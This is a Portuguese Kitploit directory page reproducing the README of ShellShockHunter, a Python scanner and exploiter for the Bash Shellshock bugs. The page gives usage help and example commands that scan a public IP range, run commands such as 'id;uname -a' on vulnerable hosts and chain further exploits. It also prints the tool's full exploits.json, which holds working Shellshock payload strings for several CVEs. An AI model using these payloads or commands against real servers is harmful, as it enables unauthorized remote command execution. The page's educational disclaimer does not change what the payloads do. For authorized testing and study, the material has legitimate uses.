Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ShellShockHunter — É uma ferramenta simples para testar a vulnerabilidade shellshock | Kitploit
Ferramentas/GitHubGitHub/mrcl0wnlab/shellshockhunter
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmrcl0wnlab/shellshockhunter

ShellShockHunter

É uma ferramenta simples para testar a vulnerabilidade shellshock

Ver Repositório
12434há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Banner ShellShockHunter v1.0

ShellShockHunter v1.0

É uma ferramenta simples para testar a vulnerabilidade shellshock

GPL License GitHub code size in bytes Python 3.8 Supported_OS Linux orange Supported OS Mac

root@kitploit:~
Autor:    MrCl0wn
Blog:     http://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Shellshock (bug de software)

Shellshock, também conhecido como Bashdoor, é uma família de bugs de segurança no shell Bash do Unix, o primeiro dos quais foi divulgado em 24 de setembro de 2014. Shellshock poderia permitir que um invasor fizesse o Bash executar comandos arbitrários e obter acesso não autorizado a muitos serviços voltados para a Internet, como servidores web, que usam Bash para processar solicitações.

Aviso

Este ou programa anterior é APENAS para fins educacionais. Não o utilize sem permissão. O aviso usual se aplica, especialmente o fato de que eu (MrCl0wnLab) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO se responsabiliza pelo conteúdo ou uso indevido destes programas ou de seus derivados. Ao usar estes programas, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do MrCl0wnLab.

Instalação

Use o gerenciador de pacotes pip

Pip

root@kitploit:~
pip install shodan
pip install ipinfo

Ajuda

root@kitploit:~
python main.py --help

                        
                                          ,/
                                        ,'/
                                      ,' /
                                    ,'  /_____,
                                  .'____    ,'    
                                        /  ,'
                                      / ,'
                                      /,'
                                    /'
             ____  _     _____ _     _     ____  _      ___       _    
            / ___|| |__ |___ /| |   | |   / ___|| |__  / _ \  ___| | __
            \___ \| '_ \  |_ \| |   | |   \___ \| '_ \| | | |/ __| |/ /
             ___) | | | |___) | |___| |___ ___) | | | | |_| | (__|   < 
            |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\
                     __   _   _             _              __                  
                    | _| | | | |_   _ _ __ | |_ ___ _ __  |_ |                 
                    | |  | |_| | | | | '_ \| __/ _ \ '__|  | |                 
                    | |  |  _  | |_| | | | | ||  __/ |     | |                 
                    | |  |_| |_|\__,_|_| |_|\__\___|_|     | |                 
                    |__|                                  |__| v1.0                
                      By: MrCl0wn / https://blog.mrcl0wn.com                                                                          
         
usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] 
[--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <20>] 
[--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

optional arguments:
  -h, --help                   show this help message and exit
  --file <ips.txt>             Input your target host lists
  --range <ip-start>,<ip-end>  Set range IP Eg.: 192.168.15.1,192.168.15.100
  --cmd-cgi <command shell>    Define shell command that will be executed in the payload
  --exec-vuln <command shell>  Executing commands on vulnerable targets
  --thread <20>, -t <20>       Eg. 20
  --check                      Check for shellshock vulnerability
  --ssl                        Enable request with SSL
  --cgi-file <cgi.txt>         Defines a CGI file to be used
  --timeout <5>                Set connection timeout
  --all                        Teste all payloads
  --debug, -d                  Enable debug mode

Comandos ex.:

root@kitploit:~
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"' --debug

Prints:

INÍCIO

Logo

PROCESSO

Logo

COMANDO ESPECIAL ( --exec-vuln 'echo "_TARGET_"' )

Logo

COMANDO ( --debug )

Logo --debug

Arquivo fonte ( Exploits )

pwd: assets/exploits.json

root@kitploit:~
{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

Arquivo fonte ( Config )

pwd: assets/config.json

root@kitploit:~
{
    "config": {
        "threads": 20,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}

Árvore

root@kitploit:~
├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print00.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── debug_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt

Referências

  • https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
  • https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
  • https://blog.inurl.com.br/search?q=shellshock
  • https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php
  • https://github.com/chelseakomlo/shellshock_demo
  • https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh
  • https://github.com/capture0x/XSHOCK/blob/master/main.py
  • https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
  • https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt
  • https://github.com/gajos112/OSCP/blob/master/Shellshock.txt
  • https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt
  • http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt
  • https://github.com/opsxcq/exploit-CVE-2014-6271
  • https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Roadmap

Comecei este projeto para estudar um pouco mais de Python e interagir mais com APIs como Shodan e ipinfo.

  • Estrutura de linha de comando
  • Banner
  • Classe de gerenciamento de arquivos
  • Classe de gerenciamento de HttpRequests
  • Classe de gerenciamento de Threads
  • Arquivo fonte para exploits
  • Cor no processo
  • Shell Exec em alvos vulneráveis
  • Processo de debug
Baixar ferramenta
  • https://manualdousuario.net/shellshock-bash-falha/
  • https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit